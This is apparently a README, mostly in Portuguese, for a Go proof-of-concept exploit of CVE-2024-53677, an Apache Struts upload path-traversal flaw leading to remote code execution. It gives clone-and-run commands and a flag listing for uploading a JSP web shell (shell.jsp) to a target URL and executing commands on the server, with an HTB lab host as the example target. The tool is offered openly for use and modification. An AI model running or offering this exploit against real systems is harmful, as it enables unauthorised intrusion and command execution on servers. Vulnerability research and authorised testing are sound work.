
a proof of concept of CVE-2024-53677
Uma vulnerabilidade antiga e amigável que afeta Apache Struts, levando a LFI e execução remota.
Apache Struts path traversal → RCE (CVE-2024-53677)
Passei muito tempo tornando isso o mais personalizável possível, porque quando encontrei esta CVE pela primeira vez, não encontrei uma boa fonte que a implementasse corretamente. A maioria das flags tem valores padrão, então não se desencoraje com tantas flags.
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
Todos esses comandos têm valores padrão. Também implementei uma função de teste para verificar onde o arquivo deve ser colocado, e é uma opção configurável pelo usuário.
go run . -url http://127.0.0.1:8080/ -end-point upload.action
Algumas coisas a notar.
Sinta-se à vontade para modificar ou adicionar ao exploit ♥️.